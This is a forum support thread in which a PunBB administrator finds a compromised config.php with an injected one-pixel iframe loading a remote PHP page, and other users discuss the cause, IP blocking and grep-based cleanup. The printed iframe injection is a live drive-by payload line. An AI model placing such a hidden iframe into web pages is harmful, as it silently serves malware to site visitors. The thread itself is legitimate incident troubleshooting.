Topic: Punbb hacked???

Today my forum is completely blank. A blank page appear if you try to access it.

Reading your forum I've checked the file config.php and this is the content (some data are masked)

<?php

$db_type = 'mysql';
$db_host = 'localhost';
$db_name = 'xxxxxx';
$db_username = 'xxxxxx';
$db_password = 'xxxxxx';
$db_prefix = 'pun_';
$p_connect = false;

$cookie_name = 'punbb_cookie';
$cookie_domain = '';
$cookie_path = '/';
$cookie_secure = 0;
$cookie_seed = 'bceb1676';

define('PUN', 1);<?php echo '<iframe src="http://cdpuvbhfzz.com/dl/adv598.php" width=1 height=1></iframe>'; ?>

What I've to do? What happened? I'm running the latest version of punbb...

2 (edited by shiftsrl 2008-04-10 10:27)

Re: Punbb hacked???

I've deleted the iframe and now the forum works but my question is. How they do that? And what is the right content of config.php?

what was the config.php file CHMOD set to 777???

Sorry. Unactive due to personal life.

I don't know before, but now is set to 444

Looks like they've intrude into the server using another account and looked for a file with write permissions.
Not a punbb vulnerability, but certainly something to be aware of and careful about.

Our friends from Ukraine have been busy. It might be handy to put 85.255.112.0/20 into your .htaccess blocklist.

I've noticed that all the files in the cache folder has the iframe trojan. Problem is that these files are recreated from withinn punbb I think so how can I avoid this?

tanks

include/cache.php generates the cache files. If you're on a *nix system, just do a quick grep of the forum dir for <iframe, to check it's nowhere else.